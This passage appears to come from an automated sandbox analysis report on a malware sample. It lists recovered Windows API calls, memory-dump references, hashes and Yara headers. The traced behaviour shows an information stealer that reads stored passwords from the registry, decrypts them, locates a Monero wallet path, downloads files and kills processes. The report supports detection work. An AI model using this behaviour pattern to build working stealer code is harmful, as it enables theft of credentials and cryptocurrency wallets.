                          • GetFileAttributesA.KERNEL32(00000000), ref: 007EE126
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 4230089145-0
                          • Opcode ID: 81ebaca30788278f9c705bda6bed7275b3e6535694473e5486389fb9313461fb
                          • Instruction ID: 89d436531d07dedd48711a1b8caf2a758338d4126cfc484ebeb6fc74de781538
                          • Opcode Fuzzy Hash: 81ebaca30788278f9c705bda6bed7275b3e6535694473e5486389fb9313461fb
                          • Instruction Fuzzy Hash: 8D61707191111CDBCB65DBA4CC48BDE77B4BF9C300F1089A5AA49A3351DB749F868F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D6AFF
                          • InternetOpenA.WININET(007FCFEC,00000001,00000000,00000000,00000000), ref: 007D6B2C
                          • StrCmpCA.SHLWAPI(?,0125EB38), ref: 007D6B4A
                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 007D6B6A
                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007D6B88
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 007D6BA1
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 007D6BC6
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 007D6BF0
                          • CloseHandle.KERNEL32(00000000), ref: 007D6C10
                          • InternetCloseHandle.WININET(00000000), ref: 007D6C17
                          • InternetCloseHandle.WININET(?), ref: 007D6C21
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                          • String ID:
                          • API String ID: 2500263513-0
                          • Opcode ID: 941a828d5b3d2c5546bf228fec6c6b2d54f87be9db7872ab59009e83b2811022
                          • Instruction ID: de1efec85ac07efecbf7c27c2eff563ed656ddeec7d65c38b2119a3dc5cbf962
                          • Opcode Fuzzy Hash: 941a828d5b3d2c5546bf228fec6c6b2d54f87be9db7872ab59009e83b2811022
                          • Instruction Fuzzy Hash: 1541B7B1600219ABDB20DFA4DC49FAE77B8EF44700F104556FA05E7281DF78AD42CBA8
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,007E4F39), ref: 007F4545
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F454C
                          • wsprintfW.USER32 ref: 007F455B
                          • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 007F45CA
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 007F45D9
                          • CloseHandle.KERNEL32(00000000,?,?), ref: 007F45E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                          • String ID: 9O~$%hs$9O~
                          • API String ID: 885711575-3956251589
                          • Opcode ID: 3f050f7c3889cc7413a77f7727033df78cb699e1b90d5fbe4a1eaf653e55c78a
                          • Instruction ID: 45d2db968a809a998ddde9aa2efc1733db71b6eca7a3d678208c62a0e5117561
                          • Opcode Fuzzy Hash: 3f050f7c3889cc7413a77f7727033df78cb699e1b90d5fbe4a1eaf653e55c78a
                          • Instruction Fuzzy Hash: EF315071A00209BBDB10DBE4DC49FEF7778EF44700F104055FA05E7280EB78AA428BA5
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DBC1F
                          • lstrlen.KERNEL32(00000000), ref: 007DBC52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DBC7C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DBC84
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DBCAC
                          • lstrlen.KERNEL32(00804AD4), ref: 007DBD23
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: 27b7c5ef331784db1d18947ca9b8f73705469f9a9c11e39a8a151cd37ae2657a
                          • Instruction ID: 3f654e8e5026efd843feb56fccfb6af319dcdeecb70a2dd303e9ac03cdfcbe39
                          • Opcode Fuzzy Hash: 27b7c5ef331784db1d18947ca9b8f73705469f9a9c11e39a8a151cd37ae2657a
                          • Instruction Fuzzy Hash: 6DA15D70A11209CFCB25DFA4D949A6EB7B5EF54304F19816AE809EB362DB39DC43CB50
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007F5F2A
                          • std::_Xinvalid_argument.LIBCPMT ref: 007F5F49
                          • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 007F6014
                          • memmove.MSVCRT(00000000,00000000,?), ref: 007F609F
                          • std::_Xinvalid_argument.LIBCPMT ref: 007F60D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 1975243496-4289949731
                          • Opcode ID: 1c0c05b086b1098429a4722d6d08eb5a7093af944de1106c9187a480f1e85bae
                          • Instruction ID: 8ae6a936fd5f02579a9c01caf8b520afc648fa5e49cc5dae53d093d3bdd90b31
                          • Opcode Fuzzy Hash: 1c0c05b086b1098429a4722d6d08eb5a7093af944de1106c9187a480f1e85bae
                          • Instruction Fuzzy Hash: 59616E70710508EBDB18CF5CC894D7EB7B6EB85304B344A59E6928B782EB39ED808795
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE06F
                          • lstrcat.KERNEL32(?,00000000), ref: 007EE07D
                          • lstrcat.KERNEL32(?,?), ref: 007EE098
                          • lstrcat.KERNEL32(?,?), ref: 007EE0AC
                          • lstrcat.KERNEL32(?,0124B9C8), ref: 007EE0C0
                          • lstrcat.KERNEL32(?,?), ref: 007EE0D4
                          • lstrcat.KERNEL32(?,0125DD90), ref: 007EE0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007EE126
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFile
                          • String ID:
                          • API String ID: 3428472996-0
                          • Opcode ID: 326d46441e26587350afe09bd8c3b08a0303af73af4104faed84ca110fc3c1ad
                          • Instruction ID: ce7e0582f06039981ba409785ef884c82ac67a92e3af3a200dd15bf816b14043
                          • Opcode Fuzzy Hash: 326d46441e26587350afe09bd8c3b08a0303af73af4104faed84ca110fc3c1ad
                          • Instruction Fuzzy Hash: 82415F7191112CDBCB25EB64DC49ADE73B4BF5C300F1089A5B94AA3252DB789F878F90
                          APIs
                            • Part of subcall function 007D77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007D7805
                            • Part of subcall function 007D77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 007D784A
                            • Part of subcall function 007D77D0: StrStrA.SHLWAPI(?,Password), ref: 007D78B8
                            • Part of subcall function 007D77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 007D78EC
                            • Part of subcall function 007D77D0: HeapFree.KERNEL32(00000000), ref: 007D78F3
                          • lstrcat.KERNEL32(00000000,00804AD4), ref: 007D7A90
                          • lstrcat.KERNEL32(00000000,?), ref: 007D7ABD
                          • lstrcat.KERNEL32(00000000, : ), ref: 007D7ACF
                          • lstrcat.KERNEL32(00000000,?), ref: 007D7AF0
                          • wsprintfA.USER32 ref: 007D7B10
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D7B39
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D7B47
                          • lstrcat.KERNEL32(00000000,00804AD4), ref: 007D7B60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                          • String ID: :
                          • API String ID: 398153587-3653984579
                          • Opcode ID: b764657e7981e532e569133b780a9b319e0d4cefc63dc11f04424947fbc75a10
                          • Instruction ID: bdb2388083a06d790b6a82ac080926ebf6202862363a43dd12a67aea142d4caa
                          • Opcode Fuzzy Hash: b764657e7981e532e569133b780a9b319e0d4cefc63dc11f04424947fbc75a10
                          • Instruction Fuzzy Hash: 4E3198B2A04218EFCB14DFA8DC449AFB779FB88710B14451AE58693351EB78ED43CB64
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 007E820C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E8243
                          • lstrlen.KERNEL32(00000000), ref: 007E8260
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E8297
                          • lstrlen.KERNEL32(00000000), ref: 007E82B4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E82EB
                          • lstrlen.KERNEL32(00000000), ref: 007E8308
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E8337
                          • lstrlen.KERNEL32(00000000), ref: 007E8351
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E8380
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 3928e18b67c6ecc433472a855da0cb234ae123a4f677ef33ede2368cde4791bc
                          • Instruction ID: eeb5beb765190bd7f3123398db37a351592f6ab758f2b4ec9bae3da458b94ba4
                          • Opcode Fuzzy Hash: 3928e18b67c6ecc433472a855da0cb234ae123a4f677ef33ede2368cde4791bc
                          • Instruction Fuzzy Hash: 85519E70602612DBDB50DF79D858A6EB7B8EF48700F104514AD0AEB345DB38ED52CBE1
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007D7805
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 007D784A
                          • StrStrA.SHLWAPI(?,Password), ref: 007D78B8
                            • Part of subcall function 007D7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 007D775E
                            • Part of subcall function 007D7750: RtlAllocateHeap.NTDLL(00000000), ref: 007D7765
                            • Part of subcall function 007D7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007D778D
                            • Part of subcall function 007D7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 007D77AD
                            • Part of subcall function 007D7750: LocalFree.KERNEL32(?), ref: 007D77B7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007D78EC
                          • HeapFree.KERNEL32(00000000), ref: 007D78F3
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 007D7A35
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                          • String ID: Password
                          • API String ID: 356768136-3434357891
                          • Opcode ID: a843c54ea1d7f8828be269ba09c009c1ca040c0af891fa4fb6488399e52bdeed
                          • Instruction ID: 2467619b91c1467abbe914fcde6f81d11891d21416c50a1209151e5a7351ff51
                          • Opcode Fuzzy Hash: a843c54ea1d7f8828be269ba09c009c1ca040c0af891fa4fb6488399e52bdeed
                          • Instruction Fuzzy Hash: 8F7141B1D0021DABDB54DF94CC80ADEB7B8FF49300F14456AE509E7340EB75AA85CB91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007D1135
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007D113C
                          • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 007D1159
                          • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 007D1173
                          • RegCloseKey.ADVAPI32(?), ref: 007D117D
                          Strings
                          • wallet_path, xrefs: 007D116D
                          • SOFTWARE\monero-project\monero-core, xrefs: 007D114F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                          • API String ID: 3225020163-4244082812
                          • Opcode ID: 75449132d8936d826157cdf79b7d8ae452b64e0d1be09274e8bed5ad2b3baffe
                          • Instruction ID: a0827bb13461027d46845d6e9a5625cd82d36df686e07720ac2f506af5540004
                          • Opcode Fuzzy Hash: 75449132d8936d826157cdf79b7d8ae452b64e0d1be09274e8bed5ad2b3baffe
                          • Instruction Fuzzy Hash: E5F06D75A4030DBBEB00DBE09C4DFAB7B7CEB04715F000054BE05E2281EAB45A4687A0
                          APIs
                          • memcmp.MSVCRT(?,v20,00000003), ref: 007D9E04
                          • memcmp.MSVCRT(?,v10,00000003), ref: 007D9E42
                          • LocalAlloc.KERNEL32(00000040), ref: 007D9EA7
                            • Part of subcall function 007F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007F71FE
                          • lstrcpy.KERNEL32(00000000,00804C48), ref: 007D9FB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemcmp$AllocLocal
                          • String ID: @$v10$v20
                          • API String ID: 102826412-278772428
                          • Opcode ID: d44c38507d24ec2e825b589298cf3c0c1bcc009fe267b33ee083729c6474c623
                          • Instruction ID: f63d33e00c2f291342f0b6248ace656ee33462937fbd85bdf96b3feadca42286
                          • Opcode Fuzzy Hash: d44c38507d24ec2e825b589298cf3c0c1bcc009fe267b33ee083729c6474c623
                          • Instruction Fuzzy Hash: C5519F72A10219ABDB10EFA4DC45B9E77B4EF90314F155426FE09EB342DB78ED068B90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007D565A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007D5661
                          • InternetOpenA.WININET(007FCFEC,00000000,00000000,00000000,00000000), ref: 007D5677
                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 007D5692
                          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 007D56BC
                          • memcpy.MSVCRT(00000000,?,00000001), ref: 007D56E1
                          • InternetCloseHandle.WININET(?), ref: 007D56FA
                          • InternetCloseHandle.WININET(00000000), ref: 007D5701
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                          • String ID:
                          • API String ID: 1008454911-0
                          • Opcode ID: 0994c66a0ff6109e2832055d567224b3022b9f709ef427ea1cb681c048600f82
                          • Instruction ID: e4c60f27cbe164b897b1399472cf68bb436079d649f5e5d441fb44d6dd45290a
                          • Opcode Fuzzy Hash: 0994c66a0ff6109e2832055d567224b3022b9f709ef427ea1cb681c048600f82
                          • Instruction Fuzzy Hash: 6841B270A00209DFDB14CF94DD84FAAB7B4FF44710F24816AE5189B3A1D7759842CB94
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 007F4759
                          • Process32First.KERNEL32(00000000,00000128), ref: 007F4769
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F477B
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F479C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 007F47AB
                          • CloseHandle.KERNEL32(00000000), ref: 007F47B2
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F47C0
                          • CloseHandle.KERNEL32(00000000), ref: 007F47CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: fb5fb090db2d4e2ca953cb4f2459b1b4264a0a4a3cd30c7aeef73cab6a3eea13
                          • Instruction ID: b11955e04eda68461275cbccc274203ea188b39f222067358939a190ffa895d3
                          • Opcode Fuzzy Hash: fb5fb090db2d4e2ca953cb4f2459b1b4264a0a4a3cd30c7aeef73cab6a3eea13
                          • Instruction Fuzzy Hash: F301927160121DABE720AFB09C89FFB77BCEB08B51F004194FA4991181EF788D928A64
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 007E8435
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E846C
                          • lstrlen.KERNEL32(00000000), ref: 007E84B2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E84E9
                          • lstrlen.KERNEL32(00000000), ref: 007E84FF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E852E
                          • StrCmpCA.SHLWAPI(00000000,00804C3C), ref: 007E853E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 75fea7980b354866dca27316fc31908d2eb6b01d688f0dbb14d9f0bf8faf01b9
                          • Instruction ID: 6ad15010758ed99c684f0b8ee75568561c79c22e507c830965e2939753d4e18a
                          • Opcode Fuzzy Hash: 75fea7980b354866dca27316fc31908d2eb6b01d688f0dbb14d9f0bf8faf01b9
                          • Instruction Fuzzy Hash: B951B4715012469FCB60DFA9D884A5BB7F9EF58300F148459EC89EB345EF38E942CB51
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 007F2925
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F292C
                          • RegOpenKeyExA.ADVAPI32(80000002,0124C2E8,00000000,00020119,007F28A9), ref: 007F294B
                          • RegQueryValueExA.ADVAPI32(007F28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 007F2965
                          • RegCloseKey.ADVAPI32(007F28A9), ref: 007F296F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
